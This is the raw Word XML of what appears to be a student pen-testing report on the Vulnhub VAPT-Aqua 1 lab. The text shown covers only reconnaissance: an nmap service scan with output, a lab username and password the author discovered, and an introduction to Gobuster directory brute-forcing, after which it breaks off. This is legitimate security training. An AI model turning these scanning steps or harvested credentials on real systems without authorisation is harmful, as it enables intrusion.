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svg" ContentType="image/svg+xml"/>
  <Default Extension="png" ContentType="image/png"/>
  <Default Extension="jpeg" ContentType="image/jpeg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1.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml"/>
  <Override PartName="/word/theme/theme1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21.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml"/>
  <Override PartName="/word/endnotes.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.endnotes+xml"/>
  <Override PartName="/word/header22.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml"/>
  <Override PartName="/word/footnotes.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footnotes+xml"/>
  <Override PartName="/word/footer12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xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" mc:Ignorable="w14 w15 w16se w16cid wp14">
  <w:body>
    <w:p w:rsidR="00D077E9" w:rsidP="00D70D02" w:rsidRDefault="00D077E9" w14:paraId="0ABD54EA" w14:textId="39FD4BC7"/>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="-7"/>
        <w:tblW w:w="1294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Description w:val="Layout table"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10620"/>
        <w:gridCol w:w="2325"/>
      </w:tblGrid>
      <w:tr w:rsidR="0046337B" w:rsidTr="51CB6664" w14:paraId="2E4C6197" w14:textId="09F1F5E4">
        <w:trPr>
          <w:trHeight w:val="2304" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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</w:tcPr>
          <w:p w:rsidRPr="00D86945" w:rsidR="0046337B" w:rsidP="51CB6664" w:rsidRDefault="05C88CAE" w14:paraId="30FA56EF" w14:textId="28B252B6">
            <w:pPr>
              <w:pStyle w:val="Title"/>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="51CB6664" w:rsidR="05C88CAE">
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidRPr="51CB6664" w:rsidR="0C6A9AF6">
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t>Vulnhub</w:t>
            </w:r>
            <w:r w:rsidRPr="51CB6664" w:rsidR="0C6A9AF6">
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t xml:space="preserve"> VAPT-Aqua </w:t>
            </w:r>
            <w:r w:rsidRPr="51CB6664" w:rsidR="0C6A9AF6">
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t xml:space="preserve">1 </w:t>
            </w:r>
            <w:r w:rsidRPr="51CB6664" w:rsidR="05C88CAE">
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0046337B" w:rsidP="51CB6664" w:rsidRDefault="05C88CAE" w14:paraId="2A454DBD" w14:textId="31673153">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="51CB6664" w:rsidR="60C5EEC4">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Ethical Hacking Pen Testing </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0046337B" w:rsidP="005D55B2" w:rsidRDefault="05C88CAE" w14:paraId="1C6F5C1E" w14:textId="5842CA65">
            <w:pPr>
              <w:pStyle w:val="Title"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="51CB6664" w:rsidR="60C5EEC4">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CSC1002 - 50633</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0046337B" w:rsidP="005D55B2" w:rsidRDefault="0046337B" w14:paraId="772DACD5" w14:textId="77777777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5EECF4" wp14:editId="77378E9C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a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main">
                  <w:pict>
                    <v:line id="Straight Connector 5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Text divider" o:spid="_x0000_s1026" strokecolor="#082a75 [3215]" strokeweight="3pt" from="0,0" to="109.5pt,0" w14:anchorId="75DE71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PuxhvuYBAAAiBAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYA&#10;CAAAACEA7s9BdtYAAAACAQAADwAAAAAAAAAAAAAAAABABAAAZHJzL2Rvd25yZXYueG1sUEsFBgAA&#10;AAAEAAQA8wAAAEMFAAAAAA==&#10;">
                      <w10:anchorlock/>
                    </v:line>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateConten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D86945" w:rsidR="0046337B" w:rsidP="51CB6664" w:rsidRDefault="0046337B" w14:paraId="2272F124" w14:textId="77777777" w14:noSpellErr="1">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0046337B" w:rsidTr="51CB6664" w14:paraId="5377AA7B" w14:textId="2E99A63B">
        <w:trPr>
          <w:trHeight w:val="7632" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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</w:tcPr>
          <w:p w:rsidR="0046337B" w:rsidP="51CB6664" w:rsidRDefault="0046337B" w14:paraId="43489B39" w14:textId="7358F222">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidR="6057261A">
              <w:drawing>
                <wp:inline wp14:editId="7A952A51" wp14:anchorId="62158178">
                  <wp:extent cx="6743700" cy="4221248"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="6900097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19a2e8266754cb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422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46337B" w:rsidP="005D55B2" w:rsidRDefault="0046337B" w14:paraId="578AE918" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0046337B" w:rsidTr="51CB6664" w14:paraId="4E2CD257" w14:textId="071D1863">
        <w:trPr>
          <w:trHeight w:val="2621" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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tcMar/>
          </w:tcPr>
          <w:p w:rsidR="0046337B" w:rsidP="005D55B2" w:rsidRDefault="05C88CAE" w14:paraId="30D4032E" w14:textId="32AEA04D">
            <w:r w:rsidRPr="51CB6664" w:rsidR="2E0B2329">
              <w:rPr>
                <w:rStyle w:val="SubtitleChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>[30/05/2023</w:t>
            </w:r>
            <w:r w:rsidRPr="51CB6664" w:rsidR="05C88CAE">
              <w:rPr>
                <w:rStyle w:val="SubtitleChar"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0046337B" w:rsidP="005D55B2" w:rsidRDefault="0046337B" w14:paraId="508AD506" w14:textId="7777777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5221EEA" wp14:editId="0D92614F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a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main">
                  <w:pict>
                    <v:line id="Straight Connector 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alt="Text divider" o:spid="_x0000_s1026" strokecolor="#082a75 [3215]" strokeweight="3pt" from="0,0" to="117.65pt,0" w14:anchorId="2207E6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SQ1WvucBAAAiBAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAU&#10;AAYACAAAACEAXfQJ4dgAAAACAQAADwAAAAAAAAAAAAAAAABBBAAAZHJzL2Rvd25yZXYueG1sUEsF&#10;BgAAAAAEAAQA8wAAAEYFAAAAAA==&#10;">
                      <w10:anchorlock/>
                    </v:line>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
          <w:p w:rsidR="0046337B" w:rsidP="005D55B2" w:rsidRDefault="0046337B" w14:paraId="791B34CC" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="10"/>
                <w:szCs w:val="10"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0046337B" w:rsidP="005D55B2" w:rsidRDefault="0046337B" w14:paraId="23C56C59" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="10"/>
                <w:szCs w:val="10"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0046337B" w:rsidP="005D55B2" w:rsidRDefault="05C88CAE" w14:paraId="67DA5E15" w14:textId="668A2906">
            <w:r w:rsidR="60F2A1B4">
              <w:rPr/>
              <w:t>Altamash Arif Karlekar</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="15470BEA" w:rsidP="51CB6664" w:rsidRDefault="15470BEA" w14:paraId="64D30052" w14:textId="144E9B32">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
            </w:pPr>
            <w:r w:rsidR="15470BEA">
              <w:rPr/>
              <w:t>A00281563</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="00D86945" w:rsidR="0046337B" w:rsidP="005D55B2" w:rsidRDefault="0046337B" w14:paraId="374E33FA" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="10"/>
                <w:szCs w:val="10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34ABA2" w:themeFill="accent6"/>
            <w:tcMar/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="0046337B" w:rsidP="005D55B2" w:rsidRDefault="0046337B" w14:paraId="023D3934" w14:textId="286B26C7">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r w:rsidRPr="00D967AC">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31BB6800" wp14:editId="38542904">
                  <wp:extent cx="1483995" cy="643890"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="3810"/>
                  <wp:docPr id="12" name="Graphic 201" descr="logo-placeholde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201" descr="logo-placeholder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70D02" w:rsidR="0087605E" w:rsidP="00DF027C" w:rsidRDefault="0087605E" w14:paraId="1385F0FC" w14:textId="77777777" w14:noSpellErr="1"/>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="3E5EA1C3" w14:textId="5746CED2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="19043D92" w:rsidP="51CB6664" w:rsidRDefault="19043D92" w14:paraId="5747E05D" w14:textId="2E6CDBA9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="19043D92">
        <w:rPr/>
        <w:t>STEP 1: INFORMATION GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="11FCDF34" w14:textId="7831DF35">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="19043D92" w:rsidP="51CB6664" w:rsidRDefault="19043D92" w14:paraId="339676F3" w14:textId="2AF35900">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="51CB6664" w:rsidR="19043D92">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker </w:t>
      </w:r>
      <w:r w:rsidRPr="51CB6664" w:rsidR="19043D92">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="51CB6664" w:rsidR="19043D92">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: 192.168.243.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="19043D92" w:rsidP="51CB6664" w:rsidRDefault="19043D92" w14:paraId="13883577" w14:textId="23B3F1E1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="51CB6664" w:rsidR="19043D92">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Machine </w:t>
      </w:r>
      <w:r w:rsidRPr="51CB6664" w:rsidR="19043D92">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="51CB6664" w:rsidR="19043D92">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: 192.168.243.24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="122920B3" w14:textId="42274B95">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="19043D92" w:rsidP="51CB6664" w:rsidRDefault="19043D92" w14:paraId="2862D5C9" w14:textId="349DB682">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="51CB6664" w:rsidR="19043D92">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Network Enumeration :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="5605EC08" w14:textId="1C5C8984">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="64764F8B" w:rsidP="51CB6664" w:rsidRDefault="64764F8B" w14:paraId="67DB4A17" w14:textId="29599BCB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="51CB6664" w:rsidR="64764F8B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="51CB6664" w:rsidR="64764F8B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="51CB6664" w:rsidR="64764F8B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.243.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="114BB7C5" w14:textId="7217C056">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="64764F8B" w:rsidP="51CB6664" w:rsidRDefault="64764F8B" w14:paraId="69CAC565" w14:textId="34F7C5C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="" w:cs=""/>
          <w:b w:val="1"/>
          <w:bCs w:val="1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1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="082A75" w:themeColor="text2" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Machine IP Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="64764F8B" w:rsidP="51CB6664" w:rsidRDefault="64764F8B" w14:paraId="69DE1CCF" w14:textId="53EA287C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="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┌──(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altamash㉿kali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)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-[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~]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="64764F8B" w:rsidP="51CB6664" w:rsidRDefault="64764F8B" w14:paraId="22719EB9" w14:textId="538B84AC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└─$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nmap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-p- -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sV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192.168.243.24 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="64764F8B" w:rsidP="51CB6664" w:rsidRDefault="64764F8B" w14:paraId="340D842E" w14:textId="193C4B93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Starting Nmap 7.93 (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https://nmap.org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) at 2023-05-31 20:39 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="64764F8B" w:rsidP="51CB6664" w:rsidRDefault="64764F8B" w14:paraId="49935E02" w14:textId="5813162F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Nmap scan report for 192.168.243.24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="64764F8B" w:rsidP="51CB6664" w:rsidRDefault="64764F8B" w14:paraId="2370DB67" w14:textId="012FB1AA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Host is up (0.0051s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="64764F8B" w:rsidP="51CB6664" w:rsidRDefault="64764F8B" w14:paraId="4CE5DA4C" w14:textId="3E1B1468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Not shown: 65531 closed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tcp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ports (conn-refused)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="64764F8B" w:rsidP="51CB6664" w:rsidRDefault="64764F8B" w14:paraId="423A92A4" w14:textId="1E96BED4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PORT    STATE    SERVICE     VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="64764F8B" w:rsidP="51CB6664" w:rsidRDefault="64764F8B" w14:paraId="08BCAADE" w14:textId="3BE70C2F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21/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tcp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 filtered ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="64764F8B" w:rsidP="51CB6664" w:rsidRDefault="64764F8B" w14:paraId="6D4E07AE" w14:textId="23A3EF91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80/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tcp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 open     http        Apache httpd 2.4.18 ((Ubuntu))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="64764F8B" w:rsidP="51CB6664" w:rsidRDefault="64764F8B" w14:paraId="49ECD580" w14:textId="0075F037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139/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tcp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open    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netbios-ssn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Samba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smbd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3.X - 4.X (workgroup: WORKGROUP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="64764F8B" w:rsidP="51CB6664" w:rsidRDefault="64764F8B" w14:paraId="77A6BBA9" w14:textId="710FD8E2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445/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tcp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open    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netbios-ssn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Samba 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smbd</w:t>
      </w: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 xml:space="preserve"> 3.X - 4.X (workgroup: WORKGROUP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="64764F8B" w:rsidP="51CB6664" w:rsidRDefault="64764F8B" w14:paraId="3C0DECAC" w14:textId="029924EA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720"/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</w:pPr>
      <w:r w:rsidRPr="51CB6664" w:rsidR="64764F8B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="" w:cs=""/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="082A75" w:themeColor="text2" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Service Info: Host: LINUXLITE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="31EE1878" w14:textId="610996A6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="" w:cs=""/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="082A75" w:themeColor="text2" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="258393B4" w:rsidP="51CB6664" w:rsidRDefault="258393B4" w14:paraId="5462AAF6" w14:textId="727CFF38">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="51CB6664" w:rsidR="258393B4">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>CONTENT DISCOVERY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="402A9365" w14:textId="6ECFD620">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="15A92F45" w14:textId="454368D1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="51CB6664" w:rsidRDefault="32B096B6" w14:paraId="3D8777CA" w14:textId="53669B17">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="32B096B6">
        <w:drawing>
          <wp:inline wp14:editId="3676B0CD" wp14:anchorId="402995CA">
            <wp:extent cx="6600825" cy="3699212"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="609626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5eb52f32b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6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B6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="3945A162" w14:textId="40C4D82C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="51CB6664" w:rsidRDefault="32B096B6" w14:paraId="2228FAFF" w14:textId="79C61E6C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="51CB6664" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>USERNAME : PASSWD DISCOVERED</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="29B747E6" w14:textId="5EA9E132">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="51CB6664" w:rsidRDefault="32B096B6" w14:paraId="3096100A" w14:textId="1CF478FA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="51CB6664" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>megumin:w</w:t>
      </w:r>
      <w:r w:rsidRPr="51CB6664" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>atashiw</w:t>
      </w:r>
      <w:r w:rsidRPr="51CB6664" w:rsidR="32B096B6">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>amegumin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="65899A1A" w14:textId="0D4EA949">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="551B8D5D" w14:textId="1CFF5FA6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="208ACFAA" w14:textId="302C1CF4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="0C517CD4" w14:textId="329FC274">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="51CB6664" w:rsidRDefault="32B096B6" w14:paraId="6582677D" w14:textId="128B31BD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="32B096B6">
        <w:drawing>
          <wp:inline wp14:editId="7CB59466" wp14:anchorId="00981389">
            <wp:extent cx="5914706" cy="3314700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="865208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8d154fad2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706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B6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="14CE2C94" w14:textId="10A059B4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="51CB6664" w:rsidRDefault="51CB6664" w14:paraId="102094C2" w14:textId="28559FC2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="32B096B6" w:rsidP="51CB6664" w:rsidRDefault="32B096B6" w14:paraId="701759A0" w14:textId="09E62BBB">
      <w:pPr>
        <w:pStyle w:val="Normal"/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</w:pPr>
      <w:r w:rsidR="32B096B6">
        <w:rPr/>
        <w:t xml:space="preserve">GOBUSTER: </w:t>
      </w:r>
      <w:r w:rsidRPr="51CB6664" w:rsidR="32B096B6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en-US"/>
        </w:rPr>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:r w:rsidRPr="51CB6664" w:rsidR="32B096B6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is a tool used to brute-force: URIs (directories and files) in web sites. DNS subdomains (with wildcard support).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="51CB6664" w:rsidP="47676966" w:rsidRDefault="51CB6664" w14:paraId="676BF774" w14:textId="777255B8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32B096B6" w:rsidP="47676966" w:rsidRDefault="32B096B6" w14:paraId="552C8368" w14:textId="11981BD1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rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="" w:cs=""/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="082974"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>┌──(</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="" w:cs=""/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="082974"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>altamash㉿kali</w:t>
      </w:r>
      <w:r w:rsidRPr="47676966" w:rsidR="32B096B6">
        <w:rPr>
